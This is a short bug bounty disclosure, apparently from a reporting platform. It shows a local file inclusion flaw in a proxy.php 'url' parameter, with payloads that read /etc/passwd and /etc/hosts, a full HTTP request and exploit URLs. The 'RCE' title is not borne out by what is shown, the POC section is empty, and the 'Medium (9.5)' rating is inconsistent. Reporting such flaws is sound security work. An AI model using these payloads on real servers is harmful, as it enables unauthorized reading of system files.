Local File Inclusion – RCE

  • Reported to Private
  • Reported by Haqtify
  • Medium (9.5)
  • $1,500
  • Published 4 months ago
  • No Likes

URL:

http://site.redacted.com

Parameter:

url

Steps to Reproduce:

1. Navigate to this page .

http://site.redacted.com/temp/stats/proxy.php?url=

2.After navigate inject this payload.

Payload:

file:///etc/passwd

file:///etc/hosts

Request:

GET /temp/stats/proxy.php?url=file:///etc/passwd HTTP/1.1
Host: site.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Final URL:

http://site.redacted.com/temp/stats/proxy.php?url=file:///etc/passwd

http://site.redacted.com/temp/stats/proxy.php?url=file:///etc/hosts

POC: